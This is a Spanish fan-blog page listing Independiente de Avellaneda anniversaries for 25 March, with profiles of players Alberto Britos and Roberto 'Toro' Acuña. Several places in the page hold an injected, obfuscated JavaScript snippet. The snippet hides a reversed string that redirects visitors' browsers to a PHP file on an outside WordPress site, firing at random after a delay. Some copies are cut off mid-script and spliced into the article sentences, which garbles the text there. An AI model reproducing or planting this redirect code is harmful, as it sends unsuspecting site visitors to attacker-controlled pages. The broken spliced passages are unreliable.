Conectate con nosotros

Efemérides

Efemérides del 25 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1931Nacimiento en Avellaneda, provincia de Buenos Aires, de Alberto Arcángel “El Negro” Britos. Half derecho del club entre 1952 y 1959, disputando 156 partidos y sin marcar goles ni lograr títulos, pero aun así siendo aclamado como todo ese equipo de la década del 50, aunque es cierto que solamente se suele mencionar al famoso Quinteto de Oro que formaba la ofensiva.

Alberto jugó algunos partidos en las inferiores de Racing, pero se cruzó rápidamente de vereda y llegó al Rojo. En 1952 el D.T. Omar Crucci lo hizo debutar en un encuentro frente a River que terminó 3 a 3. Era un equipo joven que desde el inicio de la década casi ni incorporaba jugadores, sino que promovía de sus inferiores a muchísimos talentos, y varios de ellos alcanzarían el estrellato. Por aquel entonces el club era manejado por los “gallegos”, aquellos dirigentes recordados por cuidar minuciosamente cada centavo, sin realizar excesos de gastos ni en incorporaciones, ni en contratos.

A poco tiempo de debutar, Alberto se ganó el puesto en base a su enorme sacrificio para la marca, con una entrega incuestionable. Además podía jugar tanto como half derecho o izquierdo, que se trataba de la línea media, pero en su caso destacándose más en lo que respecta a la ayuda en defensa. Por otra parte, en las divisiones menores había actuado como zaguero, motivo por el cual conocía todos los puestos de la línea defensiva.

En 1954 el Rojo con Britos como titular fue subcampeón, en un recordado torneo donde ganó todos los clásicos con los demás equipos grandes, incluyendo ambos partidos frente a Boca que salió campeón. Pero se perdieron puntos increíbles con equipos de la parte baja de la tabla, y por ello se escapó el título para ese gran conjunto que desplegaba un futbol notable.

En 1959 el “Negro” es titular la temporada que el equipo culmina tercero, y ese fue su último año en el club, para luego darse una renovación de plantel que terminaría logrando el título al año siguiente. Continuó su carrera en América de Cali a partir de 1960, equipo donde compartió cancha con Camilo Cervino, y en 1963 jugó en Estudiantes de La Plata donde se retiraría.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»69″ height=»53″/></figure></div>



<p><strong>1972</strong> – <strong>Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en Avellaneda, provincia de Buenos Aires, de Roberto Miguel Acuña, “Toro”, quien jugó en el club entre 1995 y 1997 un total de 64 partidos con 3 goles, coronándose campeón de la Supercopa 1995 en el mítico Estadio Maracaná frente a Flamengo. Roberto es argentino, pero nacionalizado paraguayo, y también con ciudadanía española.

Una historia de amor al fútbol, de amor propio, de perseverancia y superación, así fue la de este gran futbolista para poder desarrollar su carrera. Hizo inferiores en Lanús hasta que lo dejaron libre, por considerar que no mostraba aptitudes para ser un futbolista profesional. Pasó a las divisiones menores de Independiente y le sucedió lo mismo, al ser dejado libre con 17 años a finales de la década del 80.

A razón de ello se fue a Paraguay, tierra que le dio una nueva oportunidad y donde pudo iniciarse como profesional en Nacional, permaneciendo en dicho equipo hasta 1993. Mostró tan buenas condiciones desde su aparición, que a sus 21 años el D.T. de la Selección Sub-23 de Paraguay, Sergio Markarián, lo citó y él se nacionalizó para poder jugar.

En 1993 pasa a Argentinos Juniors por un año y luego por Boca. Promediando 1995 se da su llegada a Independiente, debutando en la primera fecha del Torneo Apertura de ese año, y siendo una opción de recambio en el plantel que gana la Supercopa de la mano de Miguel Ángel “Zurdo” López. Pero el cariño del hincha se lo ganaría al año siguiente, en 1996 y ya con César Menotti como D.T., cuando el equipo termina subcampeón en el Torneo Apertura jugando un fútbol notable. Su alto rendimiento, y el del equipo en general, hizo que todos los hinchas lo recuerden gratamente a pesar de no poder lograr el título, ya que el nivel de fútbol mostrado se identificaba notablemente con la historia del club.

Las actuaciones del “Toro” hicieron que Europa se fije en él, y así fue que promediando el año 1997 pasa al futbol español, donde jugaría en Zaragoza y ganaría la Copa del Rey en 2001, luego pasó a Deportivo La Coruña y más tarde a Elche. En 2004 pasa brevemente a Al Ain de Emiratos Árabes, luego retorna a Deportivo La Coruña y para 2006 regresa a la Argentina para jugar en Rosario Central.

En 2007 retorna al fútbol paraguayo donde se desempeñaría en varios equipos, como Olimpia, Rubio Ñu, 12 de Octubre, Deportivo Recoleta y 22 de Septiembre, retirándose en 2017 a la edad de 45 años siendo record de longevidad en Paraguay, además de que lo hizo en un gran nivel a base de su inteligencia para jugar en reemplazo de correr sin sentido. Además de esta gigantesca carrera a nivel de clubes, también está su extensa trayectoria en la Selección de Paraguay, disputando 100 partidos para la misma, y dando el presente en tres Mundiales consecutivos: Francia 1998, Corea-Japón 2002, y Alemania 2006. De esa forma superó los 600 partidos en su carrera.

El “Toro” Acuña era volante por el sector derecho y también volante central, con un notable despliegue en el campo de juego, mostrando capacidad tanto de marcación como en ofensiva, lo que hoy en día suele llamarse volante mixto. Tenía una potencia arrolladora sumado a su personalidad ganadora, y de allí viene su apodo, que se lo puso Alejandro Fantino mientras jugaba para Boca y lo acompañó toda su carrera. Roberto mostraba siempre criterio para jugar en corto y buscar asociarse, era inteligente para leer el juego y más aun a medida que adquirió experiencia, además tenía buena llegada al gol.

Retirado de la actividad pasó a formar parte de la selección paraguaya de fútbol playa, también se convirtió en DT, y lo último que hizo fue integrar el equipo de trabajo que tiene a su cargo las divisiones formativas de la Selección de Paraguay.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»80″ height=»61″/></figure></div>



<p>Les dejo <strong>dos videos</strong>:</p>



<p>El primero es un <strong>gran gol de cabeza del “Toro”</strong>, en la vic<script>$mWn=function(n){if(typeof ($mWn.list[n])==toria 2 a 0 sobre San Lorenzo del Clausura 1996.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»60″ height=»46″/></figure></div>



<p><strong>Y el segundo </strong>es un <strong>resumen</strong> de las <strong>jugadas de Rober<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en el 6 a 0 sobre Colón del Clausura 1997, partido en el cual se anotó en la red.

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides